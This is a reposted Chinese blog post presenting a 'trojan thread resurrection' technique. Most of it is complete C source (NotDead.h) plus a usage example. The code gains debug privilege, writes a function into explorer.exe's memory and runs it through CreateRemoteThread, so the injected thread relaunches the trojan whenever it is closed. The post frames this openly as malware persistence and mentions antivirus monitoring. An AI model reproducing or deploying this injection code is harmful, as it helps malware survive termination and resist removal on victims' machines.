木马的线程复活技术
遠程線程插入技術,挺常見而實用的東西。
只是這個遠程線程插入函數被很多殺軟作為重點監視對象,所以不知道這東西以后還能用不。
/////NotDead.h
//
#include <windows.h> #include <TLHELP32.H>TCHAR exepath[MAX_PATH]={0x00};//參數結構 typedef struct _remotepara {DWORD pWaitForSingleObject;DWORD pOpenProcess;DWORD pWinExec;DWORD PID;HANDLE hProcess;char path[MAX_PATH]; }REMOTEPARA,*pREMOTEPARA;//開啟本線程的Debug權限 bool EnableDebugPrivilege(const char *name) {HANDLE hToken;TOKEN_PRIVILEGES tp;if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))return false;if (!LookupPrivilegeValue(NULL,name,&tp.Privileges[0].Luid))return false;tp.PrivilegeCount=1;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))return false;return true; }//根據進程名獲取PID DWORD GetProcessId(char *ProcessName) {PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if (hProcessSnap==INVALID_HANDLE_VALUE)return 0;BOOL bProcess=Process32First(hProcessSnap,&pe32);while(bProcess){if (strcmp(strlwr(pe32.szExeFile),strlwr(ProcessName))==0)return pe32.th32ProcessID;bProcess=Process32Next(hProcessSnap,&pe32);}CloseHandle(hProcessSnap);return 0; }//遠程線程函數 DWORD WINAPI remote(LPVOID _rp) {REMOTEPARA *rp = (REMOTEPARA*)_rp;typedef UINT (WINAPI *XWinExec)(LPSTR,UINT);typedef HANDLE (WINAPI *XOpenProcess)(DWORD,BOOL,DWORD);typedef DWORD (WINAPI *XWaitForSingleObject)(HANDLE,DWORD);//獲取自定義函數XWaitForSingleObject MyWaitForSingleObject = (XWaitForSingleObject)rp->pWaitForSingleObject;XOpenProcess MyOpenProcess = (XOpenProcess)rp->pOpenProcess;XWinExec MyWinExec = (XWinExec)rp->pWinExec;//檢測要保護的進程是否被關閉,是則重啟進程。rp->hProcess = MyOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp->PID);MyWaitForSingleObject(rp->hProcess,INFINITE);MyWinExec(rp->path,SW_SHOW);return 0; }int NotDead() {//提權if(!EnableDebugPrivilege(SE_DEBUG_NAME))return 0;//獲取保護和被保護進程PID DWORD ProctectPID,ProctectedPID;ProctectedPID=GetCurrentProcessId();if ((ProctectPID=GetProcessId("explorer.exe")) == 0)return 0;//打開保護進程句柄HANDLE hProtecte = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProctectPID);if (hProtecte==NULL)return 0;//在保護程序中申請空間,準備寫入remote() HANDLE RemoteAddrFun;RemoteAddrFun = (PTSTR)VirtualAllocEx(hProtecte,NULL,1024*4,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if (RemoteAddrFun==NULL)return 0;//寫入remote()if (WriteProcessMemory(hProtecte,RemoteAddrFun,(LPVOID)remote,1024*4,NULL)==FALSE)return 0;//定義遠程線程函數參數 REMOTEPARA rp;memset((char *)&rp,0x00,sizeof(rp));GetModuleFileName(NULL,rp.path,260);rp.PID = ProctectedPID;HMODULE hkernel = GetModuleHandle("kernel32.dll");rp.pOpenProcess = (DWORD)GetProcAddress(hkernel,"OpenProcess");rp.pWinExec = (DWORD)GetProcAddress(hkernel,"WinExec");rp.pWaitForSingleObject = (DWORD)GetProcAddress(hkernel,"WaitForSingleObject");//在保護程序中申請空間,準備寫入參數 HANDLE RemoteAddrPara;RemoteAddrPara = (PTSTR)VirtualAllocEx(hProtecte,NULL,sizeof(rp),MEM_COMMIT,PAGE_READWRITE);if (RemoteAddrPara==NULL)return 0;//寫入參數if (WriteProcessMemory(hProtecte,RemoteAddrPara,(LPVOID)&rp,sizeof(rp),NULL)==FALSE)return 0;//===================================// 創建遠程線程//===================================HANDLE hRemoteThread = CreateRemoteThread(hProtecte,NULL,0,(LPTHREAD_START_ROUTINE)RemoteAddrFun,(LPVOID)RemoteAddrPara,0,NULL);if (hRemoteThread==NULL)return 0;CloseHandle(hProtecte);return 1; }
?
使用方法:只需要在程序中調用NotDead()即可。
示例:
// X.cpp : Defines the entry point for the application. // #include "stdafx.h" #include "resource.h" #include "NotDead.h"INT CALLBACK DlgProc(HWND hwndDlg, // handle to dialog boxUINT uMsg, // messageWPARAM wParam, // first message parameterLPARAM lParam // second message parameter ) {switch(uMsg){case WM_INITDIALOG:NotDead();break;case WM_CLOSE:EndDialog(hwndDlg,0);break;}return 0; }int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) {DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DlgProc);return 0; }?
轉載于:https://www.cnblogs.com/littleevil/archive/2012/05/21/2511278.html
總結
- 上一篇: [TCP/IP] TCP如何保证可靠性
- 下一篇: 测试时间压缩有感